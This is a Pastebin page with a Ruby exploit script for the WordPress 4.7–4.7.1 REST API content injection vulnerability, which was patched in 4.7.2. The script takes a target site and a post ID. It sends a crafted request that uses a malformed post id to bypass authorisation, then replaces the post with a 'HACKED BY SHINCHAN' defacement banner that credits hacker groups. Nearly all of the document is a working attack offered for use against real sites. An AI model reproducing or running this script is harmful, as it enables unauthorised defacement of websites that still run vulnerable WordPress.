Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: WP Content Injection
- # Date: 31 Jan' 2017
- # Exploit Author: Harsh Jaiswal
- # Vendor Homepage: http://wordpress.org
- # Version: Wordpress 4.7 - 4.7.1 (Patched in 4.7.2)
- # Tested on: Backbox ubuntu Linux
- # Based on https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
- # Credits : Marc, Sucuri, Brute
- # usage : gem install rest-client
- # Lang : Ruby
- require 'rest-client'
- require 'json'
- puts "Enter Target URI (With wp directory)"
- targeturi = gets.chomp
- puts "Enter Post ID"
- postid = gets.chomp.to_i
- response = RestClient.post(
- "#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}",
- {
- "id" => "#{postid}justrawdata",
- "slug" => "shinchan.html",
- "title" => "HACKED BY SHINCHAN",
- "content" => "<div style='text-align: center'><font size='6' face='impact'>Hacked by ShinChan ft. Al1337w0rm :*<br><img src='https://3.bp.blogspot.com/-nqnjEBoD6jY/WMqCazUxJtI/AAAAAAAAD68/93_l7CGtKaMr5ojhFvLAC4UdWZ2VZSJOQCLcB/s1600/hacked_by_shinchan.png' \/><\/div><br><div style='text-align: center'><font size='4'>Thanks To :<br>N45HT - Indonesian Freedom Security - IndoXploit Coders Team - Gantengers Crew</font></font><br><font size='4'>n45ht.web.id - fb.com/N45HTOfficial - fb.com/groups/N45HTOfficial - fb.com/ShinChan.admin - fb.com/shinchan.n45ht - shinchan0x1945@gmail.com</font>"
- }.to_json,
- :content_type => :json,
- :accept => :json
- ) {|response, request, result| response }
- if(response.code == 200)
- puts "Done! '#{targeturi}/index.php?p=#{postid}'"
- else
- puts "This site is not Vulnerable"
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement